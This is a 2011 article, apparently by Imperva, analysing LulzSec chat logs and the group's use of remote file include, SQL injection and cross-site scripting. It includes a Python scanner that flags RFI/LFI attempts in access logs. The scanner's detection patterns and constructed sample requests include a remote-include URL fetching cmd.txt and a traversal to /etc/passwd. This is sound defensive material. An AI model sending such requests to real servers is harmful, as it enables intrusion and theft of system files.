Lulzsec Chat Log Analysis From Imperva

Imperva : 30 June, 2011  (Technical Article)
Analysing chat logs from Lulzsec provided Imperva with insight into the three routes used by the team to carry out their attacks
Imperva has analysed the chat logs from Lulzsec that were published in the Guardian. This involved an analysis of the technical approach used to bring down websites and steal data.


Lulzsec was a team of hackers focused on breaking applications and databases.  There were no virus or malware experts.  Even their approach to distributed denial of service (DDoS) attacks relied on weaknesses in applications. We hope this episode helps bring attention to the fact that the center of gravity has shifted from firewalls and anti-virus to applications and databases.  For security, this does not mean “we have updated our anti-virus and put in place a network firewall.”  Rather, it means “we have identified all sensitive data and have put in place technology with the audit and protection capabilities required to safeguard that data.”


Here's a breakdown of the major technical tools used to hack sites worldwide:

1 - Tool #1: Remote File Include


The relevant snippet from the chat log stated:




"lol - storm would you also like the RFI/LFI bot with google bypass i was talking about while i have this plugged in?"


lol is Kayla, who brought a bot army to Lulzsec’s toolbox. The key in this snippet is “RFI”, or remote file include. Lulzsec used RFI to get bots to DDoS websites, which is how they brought down the CIA public site.


We have previously written that RFI attacks “have the potential to cause as much damage as the more popular SQL Injection and Cross-Site Scripting (XSS) attacks.” We also noted that RFI is “not widely discussed.” The key here is “not widely discussed.” In other words, Lulzsec used an often overlooked vulnerability to help ambush their targets. An RFI attack inserts some nasty code into a web application server. What does the code do? Usually, RFI is used to take over the web application and steal data. In the case of Lulzsec, they used it to conduct DDoS attacks. The second line, “8,000 RFI with usp flooder”, tells you that lol had 8,000 infected servers (not PCs!) to conduct the DDoS attacks. That’s pretty sizable. How much so? In our webinar on DDoS 2.0, we estimated that one infected server is equal to 3,000 bot-infected PCs, so 8,000 servers would be like 2.5M PCs.
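As an added defender-side example (not Imperva's code and not taken from the chat logs), the following Python scans web-server access log lines for the RFI/LFI indicators described above: a request parameter whose value is a remote URL or PHP stream wrapper (remote include) or a path-traversal sequence (local include). The log lines, IP addresses and parameter names are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache/nginx "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# RFI indicator: the parameter value is a remote URL or a PHP stream wrapper.
REMOTE_RE = re.compile(r'^(?:https?|ftp|php|data|phar|expect)://', re.IGNORECASE)
# LFI indicator: the value walks the filesystem or carries a NUL truncation byte.
TRAVERSAL_RE = re.compile(r'\.\.[/\\]|/etc/passwd|\x00')

def classify_param(value: str):
    """Return 'RFI', 'LFI' or None for one query-string value."""
    # parse_qsl already decoded one layer; decode twice more so that
    # double-encoded payloads (%252e%252e%252f) are still recognised.
    v = unquote(unquote(value))
    if REMOTE_RE.search(v):
        return "RFI"
    if TRAVERSAL_RE.search(v):
        return "LFI"
    return None

def scan_line(line: str):
    """Return a finding dict for one access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = m["target"].partition("?")[2]
    for name, value in parse_qsl(query, keep_blank_values=True):
        kind = classify_param(value)
        if kind:
            return {"ip": m["ip"], "ts": m["ts"], "param": name,
                    "kind": kind, "value": unquote(unquote(value))}
    return None

def scan_log(lines):
    """Run scan_line over an iterable of log lines, keeping only findings."""
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed sample lines (not real traffic); 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jun/2011:13:18:44 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.9 - - [03/Jun/2011:13:19:02 +0000] "GET /index.php?page=http://198.51.100.7/cmd.txt%3F HTTP/1.1" 200 77',
    '203.0.113.9 - - [03/Jun/2011:13:19:05 +0000] "GET /view.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1433',
    '203.0.113.4 - - [03/Jun/2011:13:20:11 +0000] "POST /login HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["kind"]} via {hit["param"]}={hit["value"]}')
```

A hit on a parameter that the application passes to include/require is the signal to investigate; the same check belongs in a WAF rule or at the application's input validation, where the parameter should be matched against an allow-list of local page names rather than accepted as a path or URL.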

2 - Tool #2: SQL Injection

Jun 03 13:18:44 [redacted] you mean with the coupons?

Jun 03 13:18:57 [redacted] was it from that SQLi

Jun 03 13:21:57 sabu yeah


Volumes have been written about SQL injection.  What more can we possibly write about the biggest vulnerability in the history of mankind that is the cause of millions of lost data records?  We described in detail here how SQL injection may have helped with the PBS hack.

3 - Tool #3: Cross Site Scripting

May 31 11:19:38 [redacted] XSS in billoreilly lol


Again, volumes on XSS.  What more can we possibly write about the 2nd biggest vulnerability in the history of mankind that is the cause of millions of lost data records?

   © 2012 ProSecurityZone.com